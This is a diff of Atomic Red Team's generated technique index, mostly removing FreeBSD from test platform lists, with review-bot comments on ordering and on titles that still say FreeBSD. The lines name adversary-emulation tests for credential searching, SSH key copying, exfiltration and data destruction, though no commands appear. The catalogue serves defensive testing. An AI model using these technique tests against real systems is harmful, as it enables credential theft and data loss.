@@ -8,13 +8,13 @@
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #11: Chmod through c script [macos, linux]
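Review bot: the rewritten entries for tests #1 to #4 and #7 come out as `[linux, macos]` while the untouched neighbours #5, #6, #8, #9 and #11 keep `[macos, linux]`, so one technique now lists its platforms in two orders. The order mirrors `supported_platforms` in each test's yaml (the yaml hunks further down move `- macos` below `- linux`); pick one order there so the generated index stops flipping between the two.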
@@ -28,7 +28,7 @@
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
@@ -60,10 +60,10 @@
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -75,10 +75,10 @@
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -87,8 +87,8 @@
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
@@ -148,9 +148,9 @@
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -161,8 +161,8 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
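Review bot: T1070.004 tests #1 and #2 lose `freebsd` from their platform lists but keep "FreeBSD/Linux/macOS" in their titles, so the index now advertises a platform the tests no longer declare. Either rename the tests in the T1070.004 yaml (for example "Delete a single file - Linux/macOS") or keep `- freebsd` under `supported_platforms`, then regenerate the index.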
@@ -174,7 +174,7 @@
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
@@ -203,15 +203,15 @@
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
@@ -233,7 +233,7 @@
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -323,7 +323,7 @@
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -334,19 +334,19 @@
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #14: whois file download [freebsd, linux, macos]
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
- Atomic Test #1: Connection Proxy [linux, macos]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -356,9 +356,9 @@
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
@@ -422,7 +422,7 @@
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -518,7 +518,7 @@
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -527,10 +527,10 @@
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
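Review bot: within this one hunk the rewritten T1552.001 entry for test #1 reads `[macos, linux]` while the rewritten entries for tests #3 and #6 read `[linux, macos]`; three tests of the same technique changed in the same commit should list their platforms in one order. The order comes from `supported_platforms` in each test's yaml, so align it there rather than in this generated file.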
@@ -552,17 +552,17 @@

# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #7: Enumerate users and groups [linux, macos]
- Atomic Test #8: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
@@ -577,9 +577,9 @@
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [freebsd, linux, macos]
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
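Review bot: `Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]` keeps freebsd in the test title while the platform list drops it, so the title and `supported_platforms` in the T1082 yaml disagree; retitle the test or keep `- freebsd`, whichever the intent is, and regenerate.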
@@ -592,16 +592,16 @@
- Atomic Test #9: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
- Atomic Test #1: Process Discovery - ps [linux, macos]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #8: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
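Review bot: `Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]` has the same title/platform mismatch as the other renamed entries: the name still lists FreeBSD after the platform list loses it. A one-line rename in the T1049 yaml (or restoring `- freebsd`) settles it; the rest of this hunk is consistent.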
@@ -609,8 +609,8 @@
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
@@ -648,24 +648,24 @@
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]

# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
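Review bot: five entries in this hunk (T1496 #1, T1485 #2 and T1529 #3, #4, #5) keep "FreeBSD/macOS/Linux" in their titles while their platform lists become `[linux, macos]`. If FreeBSD support is being withdrawn, rename these tests in their yaml so the index does not promise a platform the tests no longer declare; if it is not, `supported_platforms` should keep `- freebsd` and these index lines should not change at all.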
@@ -684,8 +684,8 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- Atomic Test #2: Command-Line Interface [linux, macos]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -733,19 +733,19 @@
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]


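Review bot: `Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]` keeps freebsd in its title after the platform list drops it, and the title is also missing a space after the comma ("freebsd, linux or macos"). Both belong in the T1048.002 yaml, not in this generated index.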
@@ -968,9 +968,9 @@
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
